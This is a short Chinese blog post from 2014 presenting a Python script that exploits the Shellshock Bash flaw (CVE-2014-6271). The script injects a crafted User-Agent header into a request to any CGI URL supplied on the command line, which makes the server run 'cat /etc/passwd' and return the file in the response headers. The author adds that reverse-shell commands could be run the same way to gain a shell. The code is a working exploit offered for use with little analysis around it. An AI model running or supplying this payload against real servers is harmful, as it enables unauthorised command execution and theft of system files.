IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    Bash远程命令执行漏洞(CVE-2014-6271)分析利用

    admin发表于 2014-09-26 12:33:53
    love 0

    这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271),昨天参加完isc,晚上回家测试了一下,写了个python版本的测试小基本,贴上代码:

    #coding:utf-8
    import urllib,httplib
    import sys,re,urlparse
    #author:nx4dm1n
    #website:http://www.nxadmin.com
    
    def bash_exp(url):
        urlsp=urlparse.urlparse(url)
        hostname=urlsp.netloc
        urlpath=urlsp.path
        conn=httplib.HTTPConnection(hostname)
        headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
        conn.request("GET",urlpath,headers=headers)
        res=conn.getresponse()
        res=res.getheaders()
        for passwdstr in res:
            print passwdstr[0]+':'+passwdstr[1]
            
        
    if __name__=='__main__':
        
        #带http
        if len(sys.argv)<2:
            print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
            sys.exit()
        else:
            bash_exp(sys.argv[1])

    脚本执行效果如图所示:

    bash命令执行

    也可以用burp进行测试。

    关于此漏洞的详细分析可以参考以下文章,具体URL为:

    http://www.cnblogs.com/LittleHann/p/3992778.html

    利用该漏洞其实可以做很多事情,写的python小脚本只是执行了cat /etc/passwd。可以执行反向链接的命令等,直接获取一个shell还是有可能的。不过漏洞存在的条件也比较苛刻,测试找了一些,发现了很少几个存在漏洞。



沪ICP备19023445号-2号
友情链接